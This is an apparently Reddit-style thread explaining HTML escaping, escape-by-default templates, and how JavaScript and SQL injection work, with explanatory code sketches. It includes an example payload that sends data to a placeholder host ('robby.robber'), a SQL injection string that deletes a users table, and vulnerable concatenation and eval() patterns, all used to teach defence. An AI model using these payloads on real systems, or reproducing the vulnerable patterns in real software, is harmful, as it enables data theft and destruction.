Best practice is to only use HTML template systems that escape by default. Most mainstream languages have at least one.
There are times when you don't want to escape something (because it's from a trusted source), and then it's best to have a static type to indicate that it's trusted. For example, Go's html/template package has an HTML type for this.
Rails does a great job with this. They monkey-patch the String class in the context of controllers/views/etc. to mark strings as HTML-unsafe by default. Every single string that gets interpolated into a template will have its HTML escaped unless you override that behavior with the #html_safe method.
It's a perfect solution because you don't need to know anything about it and you get the most secure behavior by default. If you really want to inline HTML, you'll know right away that it's not working, and you only override it in that one specific case.
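The two comments above describe the same pattern: escape everything by default and require an explicit marker for trusted HTML. Below is a minimal JavaScript sketch of that idea. It assumes a tagged template literal stands in for the template engine. SafeHtml, trusted, escapeHtml, and html are hypothetical names, not the Rails or Go APIs.

```javascript
// Sketch of "escape by default, opt out explicitly".
// SafeHtml, trusted, escapeHtml and html are hypothetical illustration names.

// Wrapper type that marks a string as already-trusted HTML.
class SafeHtml {
  constructor(value) {
    this.value = String(value);
  }
  toString() {
    return this.value;
  }
}

// The explicit opt-out, similar in spirit to Rails' #html_safe.
function trusted(value) {
  return new SafeHtml(value);
}

// Replace the characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // runs first so the entities below aren't re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Tagged template: every interpolated value is escaped unless it is SafeHtml.
function html(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    out += value instanceof SafeHtml ? value.value : escapeHtml(value);
    out += strings[i + 1];
  });
  return new SafeHtml(out);
}

const userName = '<script>alert("x")</script>';
const page = html`<p>Hello, ${userName}!</p>${trusted("<hr>")}`;
console.log(String(page));
// <p>Hello, &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;!</p><hr>
```

Because html returns a SafeHtml, a rendered fragment can be nested inside another template without being escaped twice. Everything else is escaped, including plain strings that come from users.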
So, what happens if my name is
John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite)
and your input lacks sanitization?
As input, this won't hurt, unless you do something shady like an exec(). As output, well, that's where you're supposed to escape.
How is "escaping unsanitized input to execute arbitrary code" not harmful?
What @Artemix means is that it's still just text. It can't possibly do anything harmful unless it's put in a context where it's treated as code.
The only way that happens is if it gets run through something like exec() (and why would you do that with a name?), or if it's output in a context where a browser can interpret it as JavaScript (which is where you need to make sure to escape it before doing so).
Unless I'm missing something, it's a snippet of text that escapes its containment (by "reclosing" with the additional quotation marks/tick) and adds arbitrary code.
It still needs to be treated as code by something. It's not being escaped in the comment either, but it doesn't do anything because that's not a place where JavaScript gets executed.
Am I losing my mind? It's gonna be treated as code by the JS variable you set when you accept the user-filled form, no?
user fills the form → name gets set with var name = <user_input_here> → code extravaganza
Please forgive some philosophy.
"Escaping" is something you do at an interface. It is a process of transforming data I have into another form that she wants ― of encoding.
When a sequence of characters stays within an environment (like your web browser) nothing special happens. Your web browser holds a mini document for every text field, which it updates when you type into it. The browser is able to do this because it conceives of strings in a very abstract sense.
When we write var addressee = givenName + " " + surname; we aren't really concerned about the quote characters in the middle. Instead we think abstractly about three separate strings: givenName and surname, which are already sequences of characters, and " ", which we have just summoned into the computer. Once they're all there, you and I can think about them however we want, but all the computer knows is "givenName is a list of numbers, which are 69, 109, 105, 108, 121, representing a string".
The JavaScript engine stopped caring about quote characters right after it executed " ". Quote characters are just an incantation to conjure strings into your browser.
Similarly, a SQL engine running SELECT given_name from person WHERE surname = 'Murphy'; first transforms that command into an internal representation, then runs it.
At issue is the transformation from plain text into internal forms. Data at rest is perfectly safe.
If plain text is the interface from my web server to my database, then I have to produce plain text that conjures the right data into the database when the database program interprets that text.
As you have figured out, "injection" is when you make me emit plain text that she misunderstands.
But when you type into your JavaScript console, you interact with an extra interface! That's not an injection because that interface doesn't usually exist. If you write into a form field in your browser, that input materializes in memory without any escaping at all. It lives there and means nothing more than "a sequence of bytes" unless someone tries to run it ― to decode it.
So here's the question: what can you do to trick me into making bad text for her? The answer probably doesn't include executing JavaScript on your own computer, because you don't have to treat your own browser as a black box: you control it already. In other words, you're trying to trick yourself, not me.
Instead you have to somehow subvert my interface for her.
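Here is a small Node sketch that makes the "encoding at an interface" idea concrete. The interface is JavaScript source text handed to a parser via new Function. naiveJsSource and toJsSource are hypothetical helpers. JSON.stringify is used only because its output is a valid JavaScript string literal.

```javascript
// Sketch: the interface is JavaScript source text, and the parser is "her".
// naiveJsSource and toJsSource are hypothetical helpers for illustration.

const input = `O'Brien"; alert(1); "`;

// Naive: splice raw characters into source text. The parser reads the
// quotes inside the data as syntax, not as part of the string.
function naiveJsSource(value) {
  return "return '" + value + "';";
}

// Encoded: JSON.stringify emits a valid string literal (quotes and
// backslashes escaped), so the parser decodes exactly the original data.
function toJsSource(value) {
  return "return " + JSON.stringify(value) + ";";
}

// new Function parses the source text, i.e. it decodes at the interface.
const decoded = new Function(toJsSource(input))();
console.log(decoded === input); // true: the data survived the round trip

let naiveFailed = false;
try {
  new Function(naiveJsSource(input))();
} catch (e) {
  naiveFailed = e instanceof SyntaxError;
}
console.log(naiveFailed); // true: the parser misread the data as code
```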
Damn. That's a nice overview, in human language. I appreciate that.
I think my problem was that I misjudged what a quotation mark means to the code. I assumed it's meaningful on its own (within the confines of, say, JS) because that's something I, as a web dev, have to converse in. This appears not to be the case, given that the browser is eager to store the " character as itself without breaking the compiler and its effort to keep the code sane.
"A sequence of bytes" makes more sense than "a string" in its interface sense.
<user_input_here> would still be a string. Unless you tell your program to execute that string as code, it's gonna stay as a string.
Even though I'm employing a trick that's supposed to override this? It operates within the JS-scape as long as data gets committed, and if said data could even remotely interact with the code...
...Imma test it out tomorrow.
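Here is one way to run that test, sketched for Node with the payload from the question. userInput is a hypothetical stand-in for a form field's value. As an aside, the sketch shows that this exact payload would not even parse if naively spliced into var n = '...' source. The closing "';" of the surrounding source ends up opening a string that never closes.

```javascript
// Sketch: text that looks like code is inert until something parses it as code.
// userInput is a hypothetical stand-in for a form field's value (no DOM here).
const userInput = `John ˋ"'; var maliciousSite = "http://robby.robber"; AJAX.send(data, maliciousWebsite)`;

// Storing, copying, and inspecting the string execute none of it.
const stored = userInput;
console.log(typeof stored);                        // "string"
console.log(stored.includes("var maliciousSite")); // true: the text is there...
console.log(typeof maliciousSite);                 // "undefined": ...but nothing was declared

// Only splicing it into source text and handing that to a parser makes the
// quote characters act as syntax. Here the final "'" opens an unterminated
// string, so parsing fails before any of the payload runs.
let parseError = null;
try {
  new Function("var n = '" + stored + "';");
} catch (e) {
  parseError = e;
}
console.log(parseError instanceof SyntaxError);    // true
```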
I think your understanding of how there can be an exploit is just incomplete. The key thing is that some type of code needs to get injected into a context where it will be executed. I can inject javascript into this comment, but nothing will happen because it's not being executed:
alert("test");
That's perfectly valid javascript and it's not escaped or sanitized in any way, but it's not in a place where javascript code gets executed, so it doesn't do anything. It's just text that happens to also be code. That's why the more important part of a javascript injection onto a web site is finding a way to inject the <script> tag, because that's what causes the execution.
Here's how a "typical" SQL injection vulnerability happens:
query = "select * from users where username = '" + name + "';"
result = database.execute(query)
If someone has control of the name variable's value (because it comes from a web query variable or something similar) with code like that, they can set it to something like what you showed, for example:
'; delete from users; select '1
Now, when that value gets included in the query by the code above, the SQL that ends up getting executed is:
select * from users where username = ''; delete from users; select '1';
So the entire users table gets deleted. But again, the key point is that they injected SQL into a place that would be executed as SQL. If they had put some javascript into name instead, nothing would have happened, because it's being executed as SQL, not javascript.
So for something like you originally posted (John ˋ"'; ...) to work as an exploit, it has to go somewhere that it will eventually be executed as javascript. That would only happen in form-handling code if it was doing something crazy like this:
var nameValue = document.getElementById("name").value;
var code = "var name = '" + nameValue + "';";
eval(code);
But (hopefully) nobody would ever do that. They'd just do var name = nameValue; directly, and then nothing can happen, because it's not being executed; a variable is just being set to it. Again, the execution (in this case, the eval() call) is the key factor. If the value doesn't eventually get used inside an eval(), there's no possible exploit.
Does that make sense?
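Here is a comparison with the query-building code from the SQL example. It is a sketch with no database involved. It contrasts the concatenated SQL text with a parameterized query, where the SQL text is fixed and the value is sent separately. buildConcatenated and buildParameterized are hypothetical. The { text, values } shape with $1 placeholders is modeled on node-postgres, so check your own driver's documentation for its placeholder syntax.

```javascript
// Sketch: concatenated vs. parameterized query construction (no database).
// buildConcatenated / buildParameterized are hypothetical helpers; the
// { text, values } shape is modeled on node-postgres (an assumption).

const attackerName = "'; delete from users; select '1";

// Vulnerable: the value becomes part of the SQL text the engine will parse.
function buildConcatenated(value) {
  return "select * from users where username = '" + value + "';";
}

// Parameterized: the SQL text never changes; the value travels separately,
// so the engine treats it as data rather than parsing it as SQL.
function buildParameterized(value) {
  return { text: "select * from users where username = $1", values: [value] };
}

console.log(buildConcatenated(attackerName));
// select * from users where username = ''; delete from users; select '1';
console.log(buildParameterized(attackerName).text);
// select * from users where username = $1
```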
No, because it glosses over the idea of native escaping: that you could even turn something with a delimiter in it into a string and use it as such without seeing it escaped naturally. You're saying "it won't do the thing because that's how you would do it", and nothing about why you'd have to do it this way.
I did some testing. The results are as follows. I tried to inject an entirely new variable (here is the entire test base I used). What it ended up doing was perfectly encapsulating the string that I thought would easily escape: you can see that the " quotation mark is considered part of the string, even though the string is also using quotation marks to delimit strings. If it does that with any entered text, sure, you can't escape something the way I thought you could... but why?
The way I see it, it should work – and I think it probably does work with lower-level languages – but it doesn't here.
You don't see escape characters. Try with console.log(JSON.stringify(name));
Edit: Actually, that just shows what the string would look like in code. See edit below for my thinking process.
So there is escaping. I was fucking right all the time.
I feel like a goddamn prophet now, even though none of this shit really matters. :D
Didn't follow the full conversation, but nice!
Edit: Actually, you're both right.
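Instead, try this:
var name = "var name = \"John\"; var rate = 100;";
console.log(name);
console.log(rate); // This will throw an error.
eval(name);
console.log(name);
console.log(rate); // Now it has a value.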
Without the eval, it's pretty hard to execute the code stored in a string. And strings from textboxes are auto escaped because otherwise they wouldn't be valid string types.
Edit2: Actually /u/Deimos is most likely right about the strings not being escaped. In the context of the source code, you need to escape for the parser to understand what's going on. Once the parser has gone over the string, though, it doesn't need to hold on to the escape character \.
So really, to execute the string as code, you need the interpreter to evaluate the string.
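The point in Edit2 can be checked directly. Backslash escapes are part of source-code syntax, not of the stored string. In the small sketch below, String.fromCharCode stands in for text typed into a field, which never passes through the parser.

```javascript
// Sketch: backslash escapes exist only in source code. Once the parser has
// read the literal, the string in memory holds just the characters.
const fromSource = "say \"hi\"";

console.log(fromSource.length);         // 8
console.log(fromSource.includes("\\")); // false: no backslash was stored
console.log(fromSource);                // say "hi"

// JSON.stringify re-encodes the value as a literal, adding the escapes back.
console.log(JSON.stringify(fromSource)); // "say \"hi\""

// Text that never went through a parser (like a text box value) is the same
// sequence of characters: s a y space " h i "
const typed = String.fromCharCode(115, 97, 121, 32, 34, 104, 105, 34);
console.log(typed === fromSource);      // true
```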
I’m not a web programmer at all, and I just woke up, so I could be missing something, but does HTML escaping not exist? Literally all you have to do is replace a handful of characters with their &#xx equivalents and you’re good. I don’t think encoding matters here, as most things don’t interpret look-alikes.
That's the point of the article, and most languages and template engines do provide an escape mechanism.
For example, in PHP, the htmlspecialchars() function does a great job of escaping.
It's common, especially in newer HTML template languages. But there are many, many templating languages (because it's easy to write your own), and it's not the default in all of them. Especially in the early days of the web, it was common to use print statements or a template language that's not HTML-specific, and then the programmer had to remember to do the escaping every time they printed something.
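Here is the "replace a handful of characters" approach from the question, sketched with numeric character references (&#NN;). The character set matches what PHP's htmlspecialchars() converts when ENT_QUOTES is set. However, escapeForHtml is a hypothetical helper, not a port of that function.

```javascript
// Sketch: escape the handful of HTML-significant characters with numeric
// character references. escapeForHtml is a hypothetical helper.
const REFS = { "&": "&#38;", "<": "&#60;", ">": "&#62;", '"': "&#34;", "'": "&#39;" };

function escapeForHtml(text) {
  // A single pass: an "&" produced by a replacement is never re-escaped.
  return String(text).replace(/[&<>"']/g, (ch) => REFS[ch]);
}

// With print-style output, this call has to be remembered at every output site.
const comment = `<img src=x onerror="alert('hi')">`;
console.log("<p>" + escapeForHtml(comment) + "</p>");
// <p>&#60;img src=x onerror=&#34;alert(&#39;hi&#39;)&#34;&#62;</p>
```

The sketch does the replacement in one pass so nothing is escaped twice. With plain print statements, forgetting the call at even one output site reopens the hole. That is the weakness the last comment describes and that escape-by-default templates avoid.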